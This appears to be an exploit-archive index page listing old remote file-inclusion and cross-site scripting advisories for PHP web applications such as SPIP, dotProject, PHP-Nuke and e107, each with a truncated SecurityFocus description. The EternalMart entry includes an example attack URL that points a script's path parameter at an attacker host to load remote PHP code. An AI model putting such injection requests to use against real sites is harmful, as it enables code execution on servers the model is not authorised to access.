Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/17819/info Fast Click SQL Lite is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing...

I-RATER Platinum - Common.php Remote File Inclusion

I-RATER Platinum - Common.php Remote File Inclusion source: https://www.securityfocus.com/bid/17623/info I-RATER Platinum is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue...

SPIP 1.8.3 - 'Spip_login.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/17423/info SPIP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP co...

SPIP 1.8.3 - Spip_login.php Remote File Inclusion

SPIP 1.8.3 - Spiplogin.php Remote File Inclusion source: https://www.securityfocus.com/bid/17423/info SPIP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an...

MediaSlash Gallery - 'index.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/17323/info MediaSlash Gallery is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to include an arbitrary remote file containing...

dotProject 2.0 - modulesprojectsgantt2.php?dPconfig[root_dir] Remote File Inclusion

dotProject 2.0 - modulesprojectsgantt2.php?dPconfigrootdir Remote File Inclusion source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input...

dotProject 2.0 - '/modules/projects/vw_files.php?dPconfig[root_dir]' Remote File Inclusion

source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to include an arbitrary remote file...

dotProject 2.0 - '/modules/public/date_format.php?baseDir' Remote File Inclusion

source: https://www.securityfocus.com/bid/16648/info Dotproject is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to include an arbitrary remote file...

PHP-Nuke 7.x - Multiple Remote File Inclusions

source: https://www.securityfocus.com/bid/18186/info PHP-Nuke is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary remote files containing...

PHP-Nuke 7.x - Multiple Remote File Inclusions

PHP-Nuke 7.x - Multiple Remote File Inclusions source: https://www.securityfocus.com/bid/18186/info PHP-Nuke is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit these issue...

e107 website system 0.6 - email article to a friend Feature Cross-Site Scripting

e107 website system 0.6 - email article to a friend Feature Cross-Site Scripting source: https://www.securityfocus.com/bid/10436/info e107 is prone to multiple cross-site scripting, HTML injection, file inclusion, and SQL injection vulnerabilities. This may compromise various security properties ...

e107 website system 0.6 - 'usersettings.php?avmsg' Cross-Site Scripting

source: https://www.securityfocus.com/bid/10436/info e107 is prone to multiple cross-site scripting, HTML injection, file inclusion, and SQL injection vulnerabilities. This may compromise various security properties of a Web site running the software, including allowing remote attackers to execut...

EternalMart Mailing List Manager 1.32 - Remote File Inclusion

source: https://www.securityfocus.com/bid/8767/info EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver. http://target/admin/auth.php?emmladminpath=http://attacker will include the...

Zentrack 2.2/2.3/2.4 - 'index.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/7843/info A remote file include vulnerability has been reported for Zentrack. Due to insufficient sanitization of some user-supplied variables by the 'index.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL. If the...